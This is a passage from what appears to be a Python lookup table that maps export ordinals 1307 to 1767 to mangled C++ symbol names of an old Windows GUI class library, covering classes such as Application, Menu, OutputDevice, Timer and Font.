1307: b'?GetClassIcon@@YGPAUHICON__@@PAUHWND__@@@Z',
1308: b'?GetEditSelection@@YGXPAUHWND__@@AAK1@Z',
1309: b'?GetMenuSelectMsgFlags@@YGIIJ@Z',
1310: b'?GetMenuSelectMsgId@@YGIIJ@Z',
1311: b'?GetMenuSelectMsgMenu@@YGPAUHMENU__@@IJ@Z',
1312: b'?GetMenuSelectMsgPopupMenu@@YGPAUHMENU__@@IJ@Z',
1313: b'?GetPos@PalWindowList@@QBEKPAVWindow@@@Z',
1314: b'?GetStyle@Brush@@QBE?AW4BrushStyle@@XZ',
1315: b'?IsTransparent@Font@@QBEEXZ',
1316: b'?IsVisible@Cursor@@QBEEXZ',
1317: b'?Max@Range@@QAEAAFXZ',
1318: b'?MessageHook@@YGJHIJ@Z',
1319: b'?Min@Range@@QAEAAFXZ',
1320: b'?Next@PalWindowList@@QAEPAVWindow@@XZ',
1321: b'?SelectBitmap@@YGPAUHBITMAP__@@PAUHDC__@@PAU1@@Z',
1322: b'?SetClassBrush@@YGPAUHBRUSH__@@PAUHWND__@@PAU1@@Z',
1323: b'?SetClassIcon@@YGXPAUHWND__@@PAUHICON__@@@Z',
1324: b'?Top@Stack@@QBEPAXXZ',
1325: b'??1ApplicationEvent@@QAE@XZ',
1326: b'??4DropEvent@@QAEAAV0@ABV0@@Z',
1327: b'??YPoint@@QAEAAV0@ABV0@@Z',
1328: b'??ZPoint@@QAEAAV0@ABV0@@Z',
1329: b'?ChangeRequestHdl@Exchange@@QAE?AVLink@@ABV2@@Z',
1330: b'?DropMsg@@YGJPAVWindow@@PAUHWND__@@IIJ@Z',
1331: b'?First@OutDevList@@QAEPAVOutputDevice@@XZ',
1332: b'?GetSymbol@SymbolButton@@QBE?AW4SymbolType@@XZ',
1333: b'?GetWindowInstance@@YGPAUHINSTANCE__@@PAUHWND__@@@Z',
1334: b'?Next@OutDevList@@QAEPAVOutputDevice@@XZ',
1335: b'?CbtFilterHook@@YGJHIJ@Z',
1336: b'?First@SVLookList@@QAEPAVWindow@@XZ',
1337: b'?GetWindowProc@@YGP6GJPAUHWND__@@IIJ@Z0@Z',
1338: b'?GrayBkDlgProc@@YGJPAUHWND__@@IIJ@Z',
1339: b'?GrayButtonProc@@YGJPAUHWND__@@IIJ@Z',
1340: b'?GrayDrawTextProc@@YGHPAUHDC__@@JH@Z',
1341: b'?GrayFixedProc@@YGJPAUHWND__@@IIJ@Z',
1342: b'?Next@SVLookList@@QAEPAVWindow@@XZ',
1343: b'?SubclassWindow@@YGP6GJPAUHWND__@@IIJ@Z0P6GJ0IIJ@Z@Z',
1344: b'??_GApplicationEvent@@QAEPAXI@Z',
1345: b'?AnyInput@Application@@QAEEG@Z',
1346: b'?ChangeAppFont@Application@@QAE?AVFont@@ABV2@@Z',
1347: b'?ChangeAppInternational@Application@@QAE?AVInternational@@ABV2@@Z',
1348: b'?ChangeAppMenu@Application@@QAEPAVMenuBar@@PAV2@@Z',
1349: b'?ChangeAppName@Application@@QAE?AVString@@ABV2@@Z',
1350: b'?ChangeHelp@Application@@QAEPAVHelp@@PAV2@@Z',
1351: b'?DisableHelp@Application@@QAEXW4HelpMode@@@Z',
1352: b'?DisableSVLook@Application@@QAEXXZ',
1353: b'?EnableHelp@Application@@QAEXW4HelpMode@@@Z',
1354: b'?EnableSVLook@Application@@QAEXXZ',
1355: b'?Execute@Application@@QAEXXZ',
1356: b'?GetAppFileName@Application@@QBE?AVString@@XZ',
1357: b'?GetAppFont@Application@@QBE?AVFont@@XZ',
1358: b'?GetAppInternational@Application@@QBE?AVInternational@@XZ',
1359: b'?GetAppMenu@Application@@QBEPAVMenuBar@@XZ',
1360: b'?GetAppName@Application@@QBE?AVString@@XZ',
1361: b'?GetAppWindow@Application@@QBEPAVWorkWindow@@XZ',
1362: b'?GetHelp@Application@@QBEPAVHelp@@XZ',
1363: b'?GetSize@Font@@QBEABVSize@@XZ',
1364: b'?GetpApp@@YGPAVApplication@@XZ',
1365: b'?IsActive@Timer@@QBEEXZ',
1366: b'?IsHelpEnabled@Application@@QBEEW4HelpMode@@@Z',
1367: b'?IsSVLookEnabled@Application@@QBEEXZ',
1368: b'?Quit@Application@@QAEXXZ',
1369: b'?Reschedule@Application@@QAEXXZ',
1370: b'?SetMDIMenu@@YGXPAUHWND__@@PAUHMENU__@@1@Z',
1371: b'??7String@@QBEEXZ',
1372: b'?Abort@Application@@QAEXABVString@@@Z',
1373: b'?ActivateExtHelp@Application@@UAEXXZ',
1374: b'?AppEvent@Application@@UAEXABVApplicationEvent@@@Z',
1375: b'?DeactivateExtHelp@Application@@UAEXXZ',
1376: b'?DisableMenuAccel@Application@@QAEXXZ',
1377: b'?DispatchAppEvents@Application@@QAEGHQAPAD@Z',
1378: b'?EnableMenuAccel@Application@@QAEXXZ',
1379: b'?Exception@Application@@UAEXF@Z',
1380: b'?FlushAccel@Application@@QAEXXZ',
1381: b'?InitAppRes@Application@@QAEXABVResId@@@Z',
1382: b'?InsertAccel@Application@@QAEEPAVAccelerator@@W4AccelType@@@Z',
1383: b'?InsertIdleHdl@Application@@QAEEABVLink@@G@Z',
1384: b'?IsInExecute@Application@@QBEEXZ',
1385: b'?IsInMain@Application@@QBEEXZ',
1386: b'?IsInModalMode@Application@@QBEEXZ',
1387: b'?IsMenuAccelEnabled@Application@@QBEEXZ',
1388: b'?IsWait@Application@@QBEEXZ',
1389: b'?PostAppEvent@Application@@QAEEABVString@@000@Z',
1390: b'?PostUserEvent@Application@@QAEXKPAX@Z',
1391: b'?QueryExit@Application@@UAEEXZ',
1392: b'?RemoveAccel@Application@@QAEXPAVAccelerator@@@Z',
1393: b'?RemoveIdleHdl@Application@@QAEXABVLink@@@Z',
1394: b'?SysChange@Application@@UAEXW4SysChangeType@@@Z',
1395: b'?UserEvent@Application@@UAEXKPAX@Z',
1396: b'?Wait@Application@@QAEXE@Z',
1397: b'?ActivateMDIWindow@@YGXPAUHWND__@@0@Z',
1398: b'?ActivateNextWindow@MDIApplication@@QAEPAVMDIWindow@@XZ',
1399: b'?Arrange@MDIApplication@@QAEXXZ',
1400: b'?Cascade@MDIApplication@@QAEXXZ',
1401: b'?ChangeActiveWindow@MDIApplication@@QAEPAVMDIWindow@@PAV2@@Z',
1402: b'?ChangeMDIMenu@MDIApplication@@QAEPAVPopupMenu@@PAV2@@Z',
1403: b'?CloseAll@MDIApplication@@QAEEXZ',
1404: b'?GetActiveWindow@MDIApplication@@QBEPAVMDIWindow@@XZ',
1405: b'?GetMDIMenu@MDIApplication@@QBEPAVPopupMenu@@XZ',
1406: b'?GetVisibleWindowCount@MDIApplication@@QBEGXZ',
1407: b'?GetWindowCount@MDIApplication@@QBEGXZ',
1408: b'?Horizontal@MDIApplication@@QAEXXZ',
1409: b'?IsMDIWindowMaximized@@YGEPAUHWND__@@@Z',
1410: b'?Tile@MDIApplication@@QAEXXZ',
1411: b'?Vertical@MDIApplication@@QAEXXZ',
1412: b'??0PrnList@@QAE@GG@Z',
1413: b'??1PrnList@@QAE@XZ',
1414: b'??_GPrnList@@QAEPAXI@Z',
1415: b'?Count@PrnList@@QBEKXZ',
1416: b'?First@PrnList@@QAEPAVString@@XZ',
1417: b'?GetCPUType@System@@SG?AW4CPUType@@XZ',
1418: b'?GetDefaultPrinterName@System@@SG?AVString@@XZ',
1419: b'?GetFreeMemory@System@@SGKXZ',
1420: b'?GetGUIType@System@@SG?AW4GUIType@@XZ',
1421: b'?GetGUIVersion@System@@SG?AVString@@XZ',
1422: b'?GetMenuBarHeightPixel@System@@SGGXZ',
1423: b'?GetMouseButtonCount@System@@SGGXZ',
1424: b'?GetObject@PrnList@@QBEPAVString@@K@Z',
1425: b'?GetPrinterCount@System@@SGGXZ',
1426: b'?GetPrinterName@System@@SG?AVString@@G@Z',
1427: b'?GetScreenSizePixel@System@@SG?AVSize@@XZ',
1428: b'?GetSystemFont@System@@SG?AVFont@@XZ',
1429: b'?GetSystemType@System@@SG?AW4SystemType@@XZ',
1430: b'?GetUserName@System@@SG?AVString@@XZ',
1431: b'?HasMouse@System@@SGEXZ',
1432: b'?Insert@PrnList@@QAEXPAVString@@K@Z',
1433: b'?Next@PrnList@@QAEPAVString@@XZ',
1434: b'??0DynArray@@QAE@K@Z',
1435: b'??1DynArray@@QAE@XZ',
1436: b'??_GDynArray@@QAEPAXI@Z',
1437: b'?First@PopupList@@QAEPAVWindow@@XZ',
1438: b'?Get@DynArray@@QBEPAXK@Z',
1439: b'?Next@PopupList@@QAEPAVWindow@@XZ',
1440: b'?Put@DynArray@@QAEPAXKPAX@Z',
1441: b'?ChangeHook@Sysdepen@@SGP6GHPAUHWND__@@IIJAAJ@ZP6GH0IIJ1@Z@Z',
1442: b'?ConvertToSVMetaFile@Sysdepen@@SGXAAVGDIMetaFile@@@Z',
1443: b'?ConvertToSysMetaFile@Sysdepen@@SGXAAVGDIMetaFile@@@Z',
1444: b'?DelUniqueId@UniqueId@@QAEXG@Z',
1445: b'?GetHook@Sysdepen@@SGP6GHPAUHWND__@@IIJAAJ@ZXZ',
1446: b'?GetSVFeatures@Sysdepen@@SGHXZ',
1447: b'?GethBitmap@Sysdepen@@SGPAUHBITMAP__@@ABVBitmap@@@Z',
1448: b'?GethCursor@Sysdepen@@SGPAUHICON__@@ABVPointer@@@Z',
1449: b'?GethDC@Sysdepen@@SGPAUHDC__@@ABVOutputDevice@@@Z',
1450: b'?GethIcon@Sysdepen@@SGPAUHICON__@@ABVIcon@@@Z',
1451: b'?GethInst@Sysdepen@@SGPAUHINSTANCE__@@XZ',
1452: b'?GethMDIClient@Sysdepen@@SGPAUHWND__@@XZ',
1453: b'?GethMenu@Sysdepen@@SGPAUHMENU__@@ABVMenu@@@Z',
1454: b'?GethMetaFile@Sysdepen@@SGPAUHMETAFILE__@@ABVGDIMetaFile@@@Z',
1455: b'?GethPalette@Sysdepen@@SGPAUHPALETTE__@@ABVPalette@@@Z',
1456: b'?GethPrevInst@Sysdepen@@SGPAUHINSTANCE__@@XZ',
1457: b'?GethWnd@Sysdepen@@SGPAUHWND__@@ABVWindow@@@Z',
1458: b'?IsDIB@Sysdepen@@SGHABVBitmap@@@Z',
1459: b'?IsSysMetaFile@Sysdepen@@SGHABVGDIMetaFile@@@Z',
1460: b'?NewUniqueId@UniqueId@@QAEGPAVWindow@@@Z',
1461: b'?SetSVFeatures@Sysdepen@@SGXH@Z',
1462: b'?SetWindowId@@YGXPAUHWND__@@K@Z',
1463: b'?SethBitmap@Sysdepen@@SGXAAVBitmap@@PAUHBITMAP__@@H@Z',
1464: b'?SethCursor@Sysdepen@@SGXAAVPointer@@PAUHICON__@@H@Z',
1465: b'?SethIcon@Sysdepen@@SGXAAVIcon@@PAUHICON__@@H@Z',
1466: b'?SethMetaFile@Sysdepen@@SGXAAVGDIMetaFile@@PAUHMETAFILE__@@@Z',
1467: b'?SethWnd@Sysdepen@@SGXAAVWindow@@PAUHWND__@@@Z',
1468: b'??0Menu@@QAE@ABVResId@@@Z',
1469: b'??0Menu@@QAE@XZ',
1470: b'??0MenuBar@@QAE@ABV0@@Z',
1471: b'??0MenuBar@@QAE@ABVResId@@@Z',
1472: b'??0MenuBar@@QAE@XZ',
1473: b'??0PopupMenu@@QAE@ABV0@@Z',
1474: b'??0PopupMenu@@QAE@ABVResId@@@Z',
1475: b'??0PopupMenu@@QAE@XZ',
1476: b'??1Menu@@UAE@XZ',
1477: b'??1MenuBar@@UAE@XZ',
1478: b'??1PopupMenu@@UAE@XZ',
1479: b'??4Menu@@QAEAAV0@ABV0@@Z',
1480: b'??4MenuBar@@QAEAAV0@ABV0@@Z',
1481: b'??4PopupMenu@@QAEAAV0@ABV0@@Z',
1482: b'??_7Menu@@6B@',
1483: b'??_7MenuBar@@6B@',
1484: b'??_7PopupMenu@@6B@',
1485: b'??_GMenu@@UAEPAXI@Z',
1486: b'??_GMenuBar@@UAEPAXI@Z',
1487: b'??_GPopupMenu@@UAEPAXI@Z',
1488: b'?Activate@Menu@@UAEXXZ',
1489: b'?ChangeAccelKey@Menu@@QAE?AVKeyCode@@GABV2@@Z',
1490: b'?ChangeHelpId@Menu@@QAEKGK@Z',
1491: b'?ChangePopupMenu@Menu@@QAEPAVPopupMenu@@GPAV2@@Z',
1492: b'?CheckItem@Menu@@QAEXGE@Z',
1493: b'?Clear@Menu@@QAEXXZ',
1494: b'?Deactivate@Menu@@UAEXXZ',
1495: b'?DrawAppMenu@@YGXPAVMenu@@@Z',
1496: b'?EnableItem@Menu@@QAEXGE@Z',
1497: b'?Execute@PopupMenu@@QAEGABVPoint@@@Z',
1498: b'?GetAccelKey@Menu@@QBE?AVKeyCode@@G@Z',
1499: b'?GetCurItemId@Menu@@QBEGXZ',
1500: b'?GetHelpId@Menu@@QBEKG@Z',
1501: b'?GetHelpText@Menu@@QBE?AVString@@G@Z',
1502: b'?GetItemBitmap@Menu@@QBE?AVBitmap@@G@Z',
1503: b'?GetItemCount@Menu@@QBEGXZ',
1504: b'?GetItemId@Menu@@QBEGG@Z',
1505: b'?GetItemPos@Menu@@QBEGG@Z',
1506: b'?GetItemText@Menu@@QBE?AVString@@G@Z',
1507: b'?GetItemType@Menu@@QBE?AW4MenuItemType@@G@Z',
1508: b'?GetPopupMenu@Menu@@QBEPAVPopupMenu@@G@Z',
1509: b'?GetPos@Stack@@QBEKPBX@Z',
1510: b'?GetText@PopupMenu@@QBE?AVString@@XZ',
1511: b'?Highlight@Menu@@UAEXXZ',
1512: b'?InitMenu@@YGXPAVMenu@@@Z',
1513: b'?InsertItem@Menu@@QAEEABVResId@@G@Z',
1514: b'?InsertItem@Menu@@QAEEGABVBitmap@@GG@Z',
1515: b'?InsertItem@Menu@@QAEEGABVString@@GG@Z',
1516: b'?InsertSeparator@Menu@@QAEXG@Z',
1517: b'?IsItemChecked@Menu@@QBEEG@Z',
1518: b'?IsItemEnabled@Menu@@QBEEG@Z',
1519: b'?PopActivateHdl@Menu@@QAE?AVLink@@XZ',
1520: b'?PopDeactivateHdl@Menu@@QAE?AVLink@@XZ',
1521: b'?PopHighlightHdl@Menu@@QAE?AVLink@@XZ',
1522: b'?PopSelectHdl@Menu@@QAE?AVLink@@XZ',
1523: b'?PushActivateHdl@Menu@@QAEXABVLink@@@Z',
1524: b'?PushDeactivateHdl@Menu@@QAEXABVLink@@@Z',
1525: b'?PushHighlightHdl@Menu@@QAEXABVLink@@@Z',
1526: b'?PushSelectHdl@Menu@@QAEXABVLink@@@Z',
1527: b'?RemoveItem@Menu@@QAEXG@Z',
1528: b'?RequestHelp@Menu@@UAEXABVHelpEvent@@@Z',
1529: b'?Select@Menu@@UAEXXZ',
1530: b'?SetAutoMenu@@YGXPAVMenu@@GPAVPopupMenu@@@Z',
1531: b'?SetHelpText@Menu@@QAEXGABVString@@@Z',
1532: b'?SetItemBitmap@Menu@@QAEXGABVBitmap@@@Z',
1533: b'?SetItemText@Menu@@QAEXGABVString@@@Z',
1534: b'?SetText@PopupMenu@@QAEXABVString@@@Z',
1535: b'??0MenuAccel@@QAE@XZ',
1536: b'??0MenuItemData@@QAE@XZ',
1537: b'??1MenuAccel@@QAE@XZ',
1538: b'??1MenuItemData@@QAE@XZ',
1539: b'??8KeyCode@@QBEEABV0@@Z',
1540: b'??_GMenuAccel@@QAEPAXI@Z',
1541: b'??_GMenuItemData@@QAEPAXI@Z',
1542: b'??0AutoTimer@@QAE@ABV0@@Z',
1543: b'??0AutoTimer@@QAE@XZ',
1544: b'??0Timer@@QAE@ABV0@@Z',
1545: b'??0Timer@@QAE@XZ',
1546: b'??1Timer@@QAE@XZ',
1547: b'??4Timer@@QAEAAV0@ABV0@@Z',
1548: b'??_7AutoTimer@@6B@',
1549: b'??_7Timer@@6B@',
1550: b'?ChangeTimeout@Timer@@QAEKK@Z',
1551: b'?Start@Timer@@QAEXXZ',
1552: b'?Stop@Timer@@QAEXXZ',
1553: b'?Timeout@Timer@@UAEXXZ',
1554: b'??0IDLEDATA@@QAE@XZ',
1555: b'??0IdleList@@QAE@GGG@Z',
1556: b'??1IdleList@@QAE@XZ',
1557: b'??_GIdleList@@QAEPAXI@Z',
1558: b'?Count@IdleList@@QBEKXZ',
1559: b'?First@IdleList@@QAEPAUIDLEDATA@@XZ',
1560: b'?GetCurPos@IdleList@@QBEKXZ',
1561: b'?Insert@IdleList@@QAEXPAUIDLEDATA@@K@Z',
1562: b'?Next@IdleList@@QAEPAUIDLEDATA@@XZ',
1563: b'?Remove@IdleList@@QAEPAUIDLEDATA@@XZ',
1564: b'?Remove@List@@QAEPAXXZ',
1565: b'?Seek@IdleList@@QAEPAUIDLEDATA@@K@Z',
1566: b'?Seek@List@@QAEPAXK@Z',
1567: b'??0TimerDataList@@QAE@GGG@Z',
1568: b'??1TimerDataList@@QAE@XZ',
1569: b'??_GTimerDataList@@QAEPAXI@Z',
1570: b'?Count@TimerDataList@@QBEKXZ',
1571: b'?First@TimerDataList@@QAEPAUTIMERDATA@@XZ',
1572: b'?GetCurObject@List@@QBEPAXXZ',
1573: b'?GetCurObject@TimerDataList@@QBEPAUTIMERDATA@@XZ',
1574: b'?Insert@TimerDataList@@QAEXPAUTIMERDATA@@K@Z',
1575: b'?Next@TimerDataList@@QAEPAUTIMERDATA@@XZ',
1576: b'?Remove@TimerDataList@@QAEPAUTIMERDATA@@XZ',
1577: b'??0Help@@QAE@XZ',
1578: b'?DisableBalloonMode@Help@@SGEXZ',
1579: b'?EnableBalloonMode@Help@@SGEXZ',
1580: b'?GetHelpFile@Help@@QBE?AVString@@XZ',
1581: b'?IsBalloonModeEnabled@Help@@SGEXZ',
1582: b'?SetHelpFile@Help@@QAEXABVString@@@Z',
1583: b'?ShowBalloon@Help@@SGEABVPoint@@ABVRectangle@@ABVString@@@Z',
1584: b'?ShowBalloon@Help@@SGEABVPoint@@ABVString@@@Z',
1585: b'?Start@Help@@QAEEABVString@@@Z',
1586: b'?Start@Help@@QAEEK@Z',
1587: b'?Beep@Sound@@SGXW4SoundType@@@Z',
1588: b'??0KeyCode@@QAE@ABVResId@@@Z',
1589: b'??0KeyCode@@QAE@W4KeyFuncType@@@Z',
1590: b'?GetFunction@KeyCode@@QBE?AW4KeyFuncType@@XZ',
1591: b'?GetName@KeyCode@@QBE?AVString@@XZ',
1592: b'??0Config@@QAE@ABV0@@Z',
1593: b'??0Config@@QAE@ABVString@@@Z',
1594: b'??0Config@@QAE@XZ',
1595: b'??0ConfigData@@QAE@ABV0@@Z',
1596: b'??0ConfigData@@QAE@ABVString@@@Z',
1597: b'??1Config@@QAE@XZ',
1598: b'??1ConfigData@@QAE@XZ',
1599: b'??4Config@@QAEAAV0@ABV0@@Z',
1600: b'??8Config@@QBEEABV0@@Z',
1601: b'??9Config@@QBEEABV0@@Z',
1602: b'??_GConfigData@@QAEPAXI@Z',
1603: b'?DeleteGroup@Config@@QAEXABVString@@@Z',
1604: b'?DeleteKey@Config@@QAEXABVString@@@Z',
1605: b'?GetGroup@Config@@QBE?AVString@@XZ',
1606: b'?GetKeyCount@Config@@QBEGXZ',
1607: b'?GetKeyName@Config@@QBE?AVString@@G@Z',
1608: b'?GetPathName@Config@@QBE?AVString@@XZ',
1609: b'?ReadKey@Config@@QBE?AVString@@ABV2@0@Z',
1610: b'?ReadKey@Config@@QBE?AVString@@ABV2@@Z',
1611: b'?ReadKey@Config@@QBE?AVString@@G@Z',
1612: b'?SetGroup@Config@@QAEXABVString@@@Z',
1613: b'?WriteKey@Config@@QAEXABVString@@0@Z',
1614: b'??0OutputDevice@@QAE@ABVResId@@@Z',
1615: b'??0OutputDevice@@QAE@XZ',
1616: b'??1OutputDevice@@UAE@XZ',
1617: b'??_7OutputDevice@@6B@',
1618: b'??_GOutputDevice@@UAEPAXI@Z',
1619: b'?ChangeBackgroundBrush@OutputDevice@@QAE?AVBrush@@ABV2@@Z',
1620: b'?ChangeFillInBrush@OutputDevice@@QAE?AVBrush@@ABV2@@Z',
1621: b'?ChangeFont@OutputDevice@@QAE?AVFont@@ABV2@@Z',
1622: b'?ChangePen@OutputDevice@@QAE?AVPen@@ABV2@@Z',
1623: b'?ChangeRasterOp@OutputDevice@@QAE?AW4RasterOp@@W42@@Z',
1624: b'?DrawLine@OutputDevice@@QAEXABVPoint@@0@Z',
1625: b'?DrawPixel@OutputDevice@@QAEXABVPoint@@ABVColor@@@Z',
1626: b'?DrawPoint@OutputDevice@@QAEXABVPoint@@@Z',
1627: b'?DrawRect@OutputDevice@@QAEXABVRectangle@@GG@Z',
1628: b'?GetAlign@Font@@QBE?AW4FontAlign@@XZ',
1629: b'?GetStyle@Pen@@QBE?AW4PenStyle@@XZ',
1630: b'?GetWidth@Pen@@QBEGXZ',
1631: b'?HighlightRect@OutputDevice@@QAEXABVRectangle@@@Z',
1632: b'?InvertRect@OutputDevice@@QAEXABVRectangle@@@Z',
1633: b'?Remove@OutDevList@@QAEPAVOutputDevice@@PAV2@@Z',
1634: b'?Remove@PalWindowList@@QAEPAVWindow@@PAV2@@Z',
1635: b'?SetWindowFont@@YGXPAUHWND__@@PAUHFONT__@@H@Z',
1636: b'??0EnvStack@@QAE@GG@Z',
1637: b'??0StackEntry@@QAE@XZ',
1638: b'??1EnvStack@@QAE@XZ',
1639: b'??1StackEntry@@QAE@XZ',
1640: b'??_GEnvStack@@QAEPAXI@Z',
1641: b'??_GStackEntry@@QAEPAXI@Z',
1642: b'?ChangeClipRegion@OutputDevice@@QAE?AVRegion@@ABV2@@Z',
1643: b'?ChangeClipRegion@OutputDevice@@QAE?AVRegion@@XZ',
1644: b'?ColorToSV@@YG?AVColor@@K@Z',
1645: b'?Count@EnvStack@@QBEKXZ',
1646: b'?DrawBitmap@OutputDevice@@QAEXABVPoint@@ABVBitmap@@@Z',
1647: b'?DrawBitmap@OutputDevice@@QAEXABVPoint@@ABVSize@@ABVBitmap@@@Z',
1648: b'?DrawIcon@OutputDevice@@QAEXABVPoint@@ABVIcon@@@Z',
1649: b'?DrawOutDev@OutputDevice@@QAEXABVPoint@@ABVSize@@01ABV1@@Z',
1650: b'?GetBitmap@OutputDevice@@QBE?AVBitmap@@ABVPoint@@ABVSize@@@Z',
1651: b'?GetClipRegion@OutputDevice@@QBE?AVRegion@@XZ',
1652: b'?GetOutputSize@OutputDevice@@QBE?AVSize@@XZ',
1653: b'?GetOutputSizePixel@OutputDevice@@UBE?AVSize@@XZ',
1654: b'?GetPixel@OutputDevice@@QBE?AVColor@@ABVPoint@@@Z',
1655: b'?IntersectClipRegion@OutputDevice@@QAE?AVRegion@@ABVRectangle@@@Z',
1656: b'?MoveClipRegion@OutputDevice@@QAE?AVRegion@@FF@Z',
1657: b'?Pop@EnvStack@@QAEPAUStackEntry@@XZ',
1658: b'?Pop@OutputDevice@@QAEXXZ',
1659: b'?Push@EnvStack@@QAEXPAUStackEntry@@@Z',
1660: b'?Push@OutputDevice@@QAEXXZ',
1661: b'?DrawKernText@OutputDevice@@QAEXABVPoint@@ABVString@@GGPAF@Z',
1662: b'?DrawStretchText@OutputDevice@@QAEXABVPoint@@GABVString@@GG@Z',
1663: b'?DrawText@OutputDevice@@QAEXABVPoint@@ABVString@@GG@Z',
1664: b'?GetKernTextSize@OutputDevice@@QBE?AVSize@@ABVString@@GGPAF@Z',
1665: b'?GetStretchTextSize@OutputDevice@@QBE?AVSize@@ABVString@@GGGGG@Z',
1666: b'?GetTextSize@OutputDevice@@QBE?AVSize@@ABVString@@GG@Z',
1667: b'?IsOutline@Font@@QBEEXZ',
1668: b'?IsShadow@Font@@QBEEXZ',
1669: b'?DrawArc@OutputDevice@@QAEXABVRectangle@@ABVPoint@@1@Z',
1670: b'?DrawEllipse@OutputDevice@@QAEXABVRectangle@@@Z',
1671: b'?DrawPie@OutputDevice@@QAEXABVRectangle@@ABVPoint@@1@Z',
1672: b'?DrawPolyLine@OutputDevice@@QAEXABVPolygon@@@Z',
1673: b'?DrawPolyPolygon@OutputDevice@@QAEXABVPolyPolygon@@@Z',
1674: b'?DrawPolygon@OutputDevice@@QAEXABVPolygon@@@Z',
1675: b'??0DevFontList@@QAE@GG@Z',
1676: b'??0DevFontListEntry@@QAE@PBD@Z',
1677: b'??1DevFontList@@QAE@XZ',
1678: b'??1DevFontListEntry@@QAE@XZ',
1679: b'??_GDevFontList@@QAEPAXI@Z',
1680: b'??_GDevFontListEntry@@QAEPAXI@Z',
1681: b'?Count@DevFontList@@QBEKXZ',
1682: b'?EnumFontsProc@@YGHPBUtagLOGFONTA@@PBUtagTEXTMETRICA@@KJ@Z',
1683: b'?First@DevFontList@@QAEPAUDevFontListEntry@@XZ',
1684: b'?GetColorCount@OutputDevice@@QBEKXZ',
1685: b'?GetDevFont@OutputDevice@@QBE?AVFont@@G@Z',
1686: b'?GetDevFontCount@OutputDevice@@QBEGXZ',
1687: b'?GetDevFontSize@OutputDevice@@QBE?AVSize@@ABVFont@@G@Z',
1688: b'?GetDevFontSizeCount@OutputDevice@@QBEGABVFont@@@Z',
1689: b'?GetFontMetric@OutputDevice@@QBE?AVFontMetric@@ABVFont@@@Z',
1690: b'?GetFontMetric@OutputDevice@@QBE?AVFontMetric@@XZ',
1691: b'?GetName@Font@@QBEABVString@@XZ',
1692: b'?GetObject@DevFontList@@QBEPAUDevFontListEntry@@K@Z',
1693: b'?GetSolidColor@OutputDevice@@QBE?AVColor@@ABV2@@Z',
1694: b'?GetStrikeout@Font@@QBE?AW4FontStrikeout@@XZ',
1695: b'?GetUnderline@Font@@QBE?AW4FontUnderline@@XZ',
1696: b'?Insert@DevFontList@@QAEXPAUDevFontListEntry@@K@Z',
1697: b'?IsItalic@Font@@QBEEXZ',
1698: b'?Next@DevFontList@@QAEPAUDevFontListEntry@@XZ',
1699: b'??0VirtualDevice@@QAE@ABVOutputDevice@@@Z',
1700: b'??0VirtualDevice@@QAE@XZ',
1701: b'??1VirtualDevice@@UAE@XZ',
1702: b'??_7VirtualDevice@@6B@',
1703: b'??_GVirtualDevice@@UAEPAXI@Z',
1704: b'?GetOutputSizePixel@VirtualDevice@@UBE?AVSize@@XZ',
1705: b'?SetOutputSize@VirtualDevice@@QAEEABVSize@@E@Z',
1706: b'?SetOutputSizePixel@VirtualDevice@@QAEEABVSize@@E@Z',
1707: b'??0PrnTable@@QAE@XZ',
1708: b'??_GAutoTimer@@QAEPAXI@Z',
1709: b'??_GTimer@@QAEPAXI@Z',
1710: b'?Add@PrnTable@@QAEXPAUHDC__@@PAVPrinter@@@Z',
1711: b'?Get@PrnTable@@QAEPAVPrinter@@PAUHDC__@@@Z',
1712: b'?GetName@Printer@@QBEABVString@@XZ',
1713: b'?IsDefPrinter@Printer@@QBEEXZ',
1714: b'?PrintAbortProc@@YGHPAUHDC__@@H@Z',
1715: b'?Remove@PrnTable@@QAEPAVPrinter@@PAUHDC__@@@Z',
1716: b'??0BME@@QAE@ABU0@@Z',
1717: b'??0BME@@QAE@XZ',
1718: b'??0BrushList@@QAE@GGG@Z',
1719: b'??0FME@@QAE@ABU0@@Z',
1720: b'??0FME@@QAE@XZ',
1721: b'??0FontList@@QAE@GGG@Z',
1722: b'??0PME@@QAE@XZ',
1723: b'??0PenList@@QAE@GGG@Z',
1724: b'??1BME@@QAE@XZ',
1725: b'??1BrushList@@QAE@XZ',
1726: b'??1FME@@QAE@XZ',
1727: b'??1FontList@@QAE@XZ',
1728: b'??1PME@@QAE@XZ',
1729: b'??1PenList@@QAE@XZ',
1730: b'??_GBME@@QAEPAXI@Z',
1731: b'??_GBrushList@@QAEPAXI@Z',
1732: b'??_GFME@@QAEPAXI@Z',
1733: b'??_GFontList@@QAEPAXI@Z',
1734: b'??_GPME@@QAEPAXI@Z',
1735: b'??_GPenList@@QAEPAXI@Z',
1736: b'?First@BrushList@@QAEPAUBME@@XZ',
1737: b'?First@FontList@@QAEPAUFME@@XZ',
1738: b'?First@PenList@@QAEPAUPME@@XZ',
1739: b'?GetCharOrientation@Font@@QBEFXZ',
1740: b'?GetCharSet@Font@@QBE?AW4CharSet@@XZ',
1741: b'?GetColorName@Color@@QBE?AW4ColorName@@XZ',
1742: b'?GetCurObject@BrushList@@QBEPAUBME@@XZ',
1743: b'?GetCurObject@FontList@@QBEPAUFME@@XZ',
1744: b'?GetCurObject@PenList@@QBEPAUPME@@XZ',
1745: b'?GetFamily@Font@@QBE?AW4FontFamily@@XZ',
1746: b'?GetLineOrientation@Font@@QBEFXZ',
1747: b'?GetPitch@Font@@QBE?AW4FontPitch@@XZ',
1748: b'?GetStockBrush@@YGPAUHBRUSH__@@H@Z',
1749: b'?GetStockPen@@YGPAUHPEN__@@H@Z',
1750: b'?GetWeight@Font@@QBE?AW4FontWeight@@XZ',
1751: b'?Insert@BrushList@@QAEXPAUBME@@K@Z',
1752: b'?Insert@FontList@@QAEXPAUFME@@K@Z',
1753: b'?Insert@PenList@@QAEXPAUPME@@K@Z',
1754: b'?Next@BrushList@@QAEPAUBME@@XZ',
1755: b'?Next@FontList@@QAEPAUFME@@XZ',
1756: b'?Next@PenList@@QAEPAUPME@@XZ',
1757: b'?Remove@BrushList@@QAEPAUBME@@PAU2@@Z',
1758: b'?Remove@BrushList@@QAEPAUBME@@XZ',
1759: b'?Remove@FontList@@QAEPAUFME@@PAU2@@Z',
1760: b'?Remove@FontList@@QAEPAUFME@@XZ',
1761: b'?Remove@PenList@@QAEPAUPME@@PAU2@@Z',
1762: b'?Remove@PenList@@QAEPAUPME@@XZ',
1763: b'??0Icon@@QAE@ABV0@@Z',
1764: b'??0Icon@@QAE@ABVResId@@@Z',
1765: b'??0Icon@@QAE@W4IconStyle@@@Z',
1766: b'??0Icon@@QAE@XZ',
1767: b'??1Icon@@QAE@XZ',
